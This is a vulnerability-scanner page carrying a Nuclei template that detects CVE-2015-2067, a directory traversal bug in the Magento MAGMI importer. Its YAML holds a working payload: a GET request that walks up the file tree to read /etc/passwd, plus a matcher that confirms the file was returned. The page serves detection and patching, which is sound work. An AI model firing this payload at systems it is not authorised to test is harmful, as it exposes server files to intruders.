Magento Server MAGMI - Directory Traversal
ID: CVE-2015-2067
Severity: medium
Author: daffainfo
Tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server
Description
Section titled “Description”Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
YAML Source
Section titled “YAML Source”id: CVE-2015-2067
info: name: Magento Server MAGMI - Directory Traversal author: daffainfo severity: medium description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. impact: | An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Apply the latest security patches and updates provided by Magento. reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-2067 cwe-id: CWE-22 epss-score: 0.00709 epss-percentile: 0.79991 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 vendor: magmi_project product: magmi framework: magento_server shodan-query: - http.component:"Magento" - http.component:"magento" tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server
http: - method: GET path: - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100f5a0dc0a53e9776384bc4a3bcd805dabe38f9b96111968be2ea97a66ac05e35d022100dae611f5ef0ca77652e89a5aa680078fbaaba7b3232ccb66410139008c684889:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-2067.yaml"